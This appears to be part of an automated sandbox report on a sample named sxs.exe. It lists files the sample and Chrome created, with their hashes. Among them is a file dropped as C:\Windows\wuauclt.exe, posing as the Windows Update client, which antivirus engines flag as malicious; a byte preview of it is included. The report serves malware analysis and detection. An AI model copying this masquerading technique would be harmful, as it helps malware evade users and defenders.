                                                                          Preview:L..................F.@.. ...$+.,.....U-.%...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:12:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2679
                                                                          Entropy (8bit):3.9927063728101886
                                                                          Encrypted:false
                                                                          SSDEEP:48:8hdtT1tJwHRidAKZdA1weh/iZUkAQkqeh1y+2:8R/JI9QQy
                                                                          MD5:31BF43ADBFDF7ADFC744DE248903FC60
                                                                          SHA1:0B44EC6986A412672D6360FA36DC447EA86D3CB5
                                                                          SHA-256:6BC1261E6ECF149852F3842B74F37598DD494C72958523E464635F867846DAEC
                                                                          SHA-512:15F27458BEA960C04F8046E95793E2BBE2A2CB11B8F651CF7CB7039072160BDCDCC1AC376BC2A15B12C3297EAA72C1D8F62090AA47428A99CB04ECB9C2F95CED
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ...$+.,....E...%...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2693
                                                                          Entropy (8bit):4.003533576166142
                                                                          Encrypted:false
                                                                          SSDEEP:48:8xmdtT1tsHRidAKZdA14tseh7sFiZUkmgqeh7sry+BX:8xs/0nxy
                                                                          MD5:03623012A2E629EB99AFACF328460DDF
                                                                          SHA1:E67BEE9A25D86C1D55F3B245D9B96EFB4C8025D5
                                                                          SHA-256:C9FB49B6FBC07BA2F47FE00F6EED50E0DFB6371A5F1749957212446B61BA1124
                                                                          SHA-512:E88B17167339660744D56498AC637578EA52EA98DF34E1057C4930C71C76E3148462665F85D0020A67A54FE7F265B0B756F444983447335168E11A2388524A25
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:12:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2681
                                                                          Entropy (8bit):3.992745696895053
                                                                          Encrypted:false
                                                                          SSDEEP:48:8PdtT1tJwHRidAKZdA1vehDiZUkwqehJy+R:87/JTjy
                                                                          MD5:592AD444323967DAE29BB6676BF676BC
                                                                          SHA1:892B1E4089FF6DE7E0C83966ADC6C4DCB126B6E3
                                                                          SHA-256:E468CB7CAF4359AD913F62AC7C94E8161E4572F5561E0F44DE9B853A7014D5CB
                                                                          SHA-512:F3CB4F898F95FD716636BC5B0B1D156CEEA8A415ACF44C54996031D27DFC864CB3116C958FF49CF1A1EFE34773F1C55203223619F65E839FA1C1448193A38861
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ...$+.,.......%...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:12:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2681
                                                                          Entropy (8bit):3.979272445959386
                                                                          Encrypted:false
                                                                          SSDEEP:48:87dtT1tJwHRidAKZdA1hehBiZUk1W1qehHy+C:8X/JD9ny
                                                                          MD5:570361B67511423D389A45EA82AE23F3
                                                                          SHA1:7817798EB4F5CED15AC53E38593AA03F4C23CE60
                                                                          SHA-256:3957007E031AEB174B34A9E2C8045D71BC4300EF783B00E27496726656B973BD
                                                                          SHA-512:B9BAACF234BAB92B4EB38CA03A1F324B483B761404C64202115C1E8C4E45AB002EB63C9EF5E54E6F1C8E61980A16DAEC445CC6B6536BFE65F5430E5066B07D7E
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ...$+.,......$.%...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:12:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2683
                                                                          Entropy (8bit):3.9888246330638806
                                                                          Encrypted:false
                                                                          SSDEEP:48:8HfdtT1tJwHRidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbxy+yT+:8Hr/JzT/TbxWOvTbxy7T
                                                                          MD5:DBE90D8D4875A812EC2619C38FC4A593
                                                                          SHA1:C9E6540057EF478B478A427D9A3A2C0CEEAE33F6
                                                                          SHA-256:3E82F3D5155512BE88B8C430C4C5B633A3947163EA60F63C6895C1BE2B0E79BA
                                                                          SHA-512:09E1D313FFCF7EBFED8AD01049885032D858116E524B71E5626806F4D599999E8993B2DFCDA2491AC03D62DB850050552AE4223A980E80D5ADC20CEF18AB348B
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ...$+.,.......%...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                          C:\Windows\noruns.reg

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\sxs.exe
                                                                          File Type:Windows Registry text (Win95 or above)
                                                                          Category:modified
                                                                          Size (bytes):10
                                                                          Entropy (8bit):3.121928094887362
                                                                          Encrypted:false
                                                                          SSDEEP:3:0QOvn:bOvn
                                                                          MD5:C756B8EAC93DE58D57105A6C35ADB50F
                                                                          SHA1:B18D370DABC3C5B9E82D74F19BBC101A1BE009F2
                                                                          SHA-256:853448E59C9BB7599FA8A5FF03A0B608781A02D41F58576F1192E0C48CB8D635
                                                                          SHA-512:09FBFE4A17B1FB6167C6889E5A0AB41CFEF9E1372796E69C2558A50A002D9C1E2B0D81D45D7F96BE9D02A8025D0AE276ECC01F135E9CCB04C301ADCFFD67D263
                                                                          Malicious:true
                                                                          Preview:REGEDIT4..

                                                                          C:\Windows\wuauclt.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\sxs.exe
                                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):55448
                                                                          Entropy (8bit):7.763459210430956
                                                                          Encrypted:false
                                                                          SSDEEP:1536:8BZMeVfnEM+jlv4mXwLX3Pb29jb0Y+YUjL3IVokJ3:8jMsfnEMmqEUfiNb0YA3OF
                                                                          MD5:4F89E3A88853265154E24969581FB45A
                                                                          SHA1:D5AE12CFE50AC91702DA2CCD4E21321EF256EA2A
                                                                          SHA-256:EE77A17F0C1FF00FB7EB9A453EC22BB63AE382256211B6AA5DB67C48E52FED73
                                                                          SHA-512:A5A8CD57D6158113552D345DBAAEC41175C45BD8A6D1558F0FA4C0B7596C32630E1F5C9F0824AA856467FF06BDB4013F486402CAB085E67D87536F8AF7DD0EBA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 91%
                                                                          Preview:MZ..........PE..L........................~........................@..........................p...................@...........................S..(...........................................................VT......................................................es2z0....p..............................es2z1...............................`...es2z2........`..:...................`...:....S......u..S..$...t-.....H.....S.;C.s....s....w.AA....V..+..^.^...P.S....@x.u..c.PU.S....3.A......r....u...F...KERNEL32.dll...L...p..Y.......................................................+...........................6.......CT..!T..4T...............# ..&.T......2@..2@..2@..2@..2@..2@..2@..2@..2@..2@.......@.. .H.... .T.$.D. .D@!.D. .@...D. .....D. 2@...D. ...$.D. .P. .D. .....D. 6P.#.D.....".P."...".@................. .........P.$...............................T.....(&..@u.....?3...3.N.3...3.(.3.Y.3...3.;.3.d.3...3..."BY.._.h..S.6......G....X..Ge.T....G...3\s.G..3.r/.GS......G...y>..G..../..G..~..G...

                                                                          C:\Windows\wuauclt.exe:Zone.Identifier

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\sxs.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                          Chrome Cache Entry: 100

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65465)
                                                                          Category:dropped
                                                                          Size (bytes):691127
                                                                          Entropy (8bit):5.6159903673455736
                                                                          Encrypted:false
                                                                          SSDEEP:12288:Asb1QYnTxQYnT9DUk4f0WTI4WugqciqXDEu4Om4+BcWu2:A01QYnTxQYnTF4OH6
                                                                          MD5:35DF29B922F485757F6253377D2300F4
                                                                          SHA1:E579DF30408E9EE6670F9EFC3D8CA9AF4DF04D3E
                                                                          SHA-256:83DA041AD32EE87CB3FC0938C24D77625B66C109D0124A51047518D80D89422E
                                                                          SHA-512:4E8C780A286A1D81DDE2AA3D8126DEAFD0CD5ACC94F3BF75FCD548C98061FB4DD887D4007A6C6630CDD04CB0DAE3E288A4CE4195F5946B201DAFF68A476A2869
                                                                          Malicious:false
                                                                          Preview:/*! For license information please see main.5bbf83b7.js.LICENSE.txt */.(()=>{var e={8665:e=>{"use strict";function t(e){return(t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}e.exports=function(){for(var e,n,r=[],o=window,i=o;i;){try{if(i.frames.__tcfapiLocator){e=i;break}}catch(e){}if(i===o.top)break;i=i.parent}e||(function e(){var t=o.document,n=!!o.frames.__tcfapiLocator;if(!n)if(t.body){var r=t.createElement("iframe");r.style.cssText="display:none",r.name="__tcfapiLocator",t.body.appendChild(r)}else setTimeout(e,5);return!n}(),o.__tcfapi=function(){for(var e=arguments.length,t=new Array(e),o=0;o<e;o++)t[o]=arguments[o];if(!t.length)return r;"setGdprApplies"===t[0]?t.length>3&&2===parseInt(t[1],10)&&"boolean"==typeof t[3]&&(n=t[3],"function"==typeof t[2]&&t[2]("set",!0)):"ping"===t[0]?"function"==typeof t[2]&&t[2]({gdprApplie

                                                                          Chrome Cache Entry: 101

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (380), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):380
                                                                          Entropy (8bit):5.443905989268889
                                                                          Encrypted:false
                                                                          SSDEEP:6:xWzPNvUBUQ8UQObhINV2HSuPTv7M+dFNh8UQ8UQOb+Gp/p2HSuPTvAen:xW+raObmNZgv7Hv8aObr1gv7n
                                                                          MD5:5FCDE125FDFD7F8267E3DDD9F09C5755
                                                                          SHA1:B03A86045E3B4C43B85BA50C4978EEB2B663FABE
                                                                          SHA-256:62D815789708300C1583DB95EBAA24775CF225C3A2A3CF649D8188B8E163BCC0
                                                                          SHA-512:C157D565CCAF3C8CB0C8739DBDFD2B0B268E0E7DE9794B2A4902F9EB0D2CB6EC3248E2ECD5B0C462792B0EEBDDDE47DE68C21E6B88359F6FE84AF4314A588B61
                                                                          Malicious:false
                                                                          URL:https://partner.googleadservices.com/gampad/cookie.js?domain=www.onefordvd.com&client=dp-namemedia06_3ph&product=SAS&callback=__sasCookie&cookie_types=v1%2Cv2
                                                                          Preview:__sasCookie({"_cookies_":[{"_value_":"ID=01f7242aff40d341:T=1724944342:RT=1724944342:S=ALNI_MYqfL9NHYRt19JVhWCtetlof-oSxw","_expires_":1758640342,"_path_":"/","_domain_":"onefordvd.com","_version_":1},{"_value_":"UID=00000eac5bf6050a:T=1724944342:RT=1724944342:S=ALNI_MZxlzR5DrwrWzN86zdZezrNOkx_Cg","_expires_":1758640342,"_path_":"/","_domain_":"onefordvd.com","_version_":2}]});

                                                                          Chrome Cache Entry: 102

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 16 colors, 32x32, 16 colors
                                                                          Category:downloaded
                                                                          Size (bytes):1078
                                                                          Entropy (8bit):1.240940859118772
                                                                          Encrypted:false
                                                                          SSDEEP:3:etFEh9HYflvlNl/AXll1pe/WNN00000000000000000000000000000000000001:QNtY6+lKY6
                                                                          MD5:4123CE1E1732F202F60292941FF1487D
                                                                          SHA1:9F12B11BDE582DAE37CE8C160537D919C561C464
                                                                          SHA-256:D961B08E4321250926DE6F79087594975FE20AD1518DE8F91EB711AF5D1A6EF8
                                                                          SHA-512:11B24C2E622C408E4774FAE120B719A21A0B2ACFA53230126C35AD6CA57D33D4DE79CBE11D296CFBDE9613CAA03D66B721BD20CF4EE030CF75F5A1FD8A286DA9
                                                                          Malicious:false
                                                                          URL:https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250
                                                                          Preview:..............(...&... ..........N...(....... ...............................................................................................................................................................................................................................................................................................(... ...@.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          Chrome Cache Entry: 103

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):985
                                                                          Entropy (8bit):5.283404361019129
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yel+TLOwoeH6fvTdm1mh9dVbc8EDzzfXaHo4JT:YegLpafxwmPctzyHbJT
                                                                          MD5:ED926A671F1BC370EC439DEB622B92DE
                                                                          SHA1:B3A48748B11D47F0E71CFDF738EF4E0AD3A4866E
                                                                          SHA-256:BFC14308A86D3214A6214644DF3585D6003CBF0C89B14D87C70C0576C183494F
                                                                          SHA-512:441B9A4D57D8A6BFD00769FB436FF1738D4A8BB6B42316CAB750823F8F078F30BF1978871351658A648FF496297E936E9F87B01F06B8BA4F2F61A593CA8352FD
                                                                          Malicious:false
                                                                          Preview:{"system":"SN","account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","customerId":"00000000-0000-0000-0000-000000000000","displayType":"ADS","dataSource":"INVENTORY","adSense":{"drid":"as-drid-2412708874333548","channel":"06902","pubId":"dp-namemedia06_3ph"},"domain":{"rootDomain":"onefordvd.com","expiresAt":"","status":{"internal":"ACTIVE"},"isAdult":false,"hasAuction":false},"lander":{"template":"ARROW_3","domainDisplayName":"onefordvd.com","headerText":"","footerText":"","headerHtml":"","footerHtml":"","banner":{"show":true,"text":"onefordvd.com may be for sale!","link":"http://domainretailing.com/rg-dsale3p.php?d=onefordvd.com\u0026doe=YWNtZWJpbGxpbmdjb0BnbWFpbC5jb20%3D\u0026dil=SW5xdWlyZSBhYm91dA%3D%3D\u0026ct=teMjLe7_S","type":"AFTERNIC"},"i18n":true,"showDomain":true},"experiment":{"experiment":"parking_cp_ab_01","cohort":"on","start":"","end":"","enabled":true,"data":{"targetCustomerIds":["7dbc6047-87b6-4724-9c84-1e076f5b7c3d"],"useSerpForAdsenseFail":true}}}.

                                                                          Chrome Cache Entry: 104

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (1618)
                                                                          Category:dropped
                                                                          Size (bytes):153696
                                                                          Entropy (8bit):5.543853269836751
                                                                          Encrypted:false
                                                                          SSDEEP:1536:YX/xbg4DuPemooPy7WnHPh4a2EwG19OxHRdjhJBjDSc4Y52kovgwlZXqjzsZ1Dsb:H59cjhJB7wkeesZtpmqc+VHu
                                                                          MD5:ECADDCD9B000B9C725F38827541E0824
                                                                          SHA1:2AA04AE1B0E9FADB01CAEAE4B35A44ECE21B9F96
                                                                          SHA-256:82DDD046F3EE9BF0AD9F0820D9BDCAD6AA783EC0C30CD7E2E1BB50790CB0F17D
                                                                          SHA-512:C973CB6448C479AF62D8526ABF10D89C0F69309D58D5894D052348AEC88E796707E12252A63DD627AB6E3AF2BB0A14A71C9A0C34A077D679D65B2554855DB8F2
                                                                          Malicious:false
                                                                          Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17301437,17301439,17301442,17301511,17301516,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog"}};var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca=typeof Object

                                                                          Chrome Cache Entry: 105

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (3809)
                                                                          Category:downloaded
                                                                          Size (bytes):3854
                                                                          Entropy (8bit):5.080165020112225
                                                                          Encrypted:false
                                                                          SSDEEP:96:Jw8mbMy5F7ZBibyxb6LmPSL5wpD8LtPHAC:OF7ZrSZoAPH9
                                                                          MD5:3F821ADA778691E677AEF2CEA8C4B4F6
                                                                          SHA1:643E7B729B25C2F800469623191DC837798E9D50
                                                                          SHA-256:7510035D553A99FBF93EB67737B2DF057CE096FA1ED7AAD83CFD559E11F2320D
                                                                          SHA-512:8993A8AD28ED4035A022D1B7274C77A97B8235B2DDCD5E6D29F7230D375851539900D4ACE652C94C4BE8A8284FFD86501DF420385A6E680DF4222C162DEFF4D5
                                                                          Malicious:false
                                                                          URL:https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.css
                                                                          Preview:.Banner_banner__G1ca3{margin-bottom:5%}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-wrapper{box-shadow:none;box-sizing:border-box;height:100%;margin:0;max-width:100%;padding-top:1rem}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-wrapper>*{margin:auto;max-width:40rem}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-background{background-color:#0000!important}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-container{background-color:#fff;border-left:1px solid #e0e0e0;border-radius:15px 15px 0 0;border-right:1px solid #e0e0e0;border-top:1px solid #e0e0e0;box-sizing:border-box;display:flex;flex-direction:column;padding:1rem}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-container .banner-details-container{margin:0}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-container .banner-details-container .description-group{display:flex;flex-direction:row;gap:1rem}@media screen and (max-width:640px){.trustArc_parkingTrustArcBanner__Ijwo0 .trustar

                                                                          Chrome Cache Entry: 106

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (1618)
                                                                          Category:downloaded
                                                                          Size (bytes):153696
                                                                          Entropy (8bit):5.5438379292863225
                                                                          Encrypted:false
                                                                          SSDEEP:1536:XX/xbg4DuPemooPy7WnHPh4a2EwG19OxHRdjhJBjDSc4Y52kovgwlZXqjzsZ1Dsb:U59cjhJB7wkeesZtpmqc+VHu
                                                                          MD5:A11EDECA56234DE36AE278182D0917F5
                                                                          SHA1:60D000671F16B5AAC086BF720046B1EEE20511F9
                                                                          SHA-256:5FD81BDB36C36D241EC24043F54BBC996ABDDA9FE03DC81FE6F3157F0CBA22D0
                                                                          SHA-512:554E8F3D6532C8CE894ADF4A6C215223F851D188E78654E56A45F9DC5AAE4D3F4B111897510CBB0C4EC083313697F35C34E8F250D091DA3873031C99F63E09D8
                                                                          Malicious:false
                                                                          URL:https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true
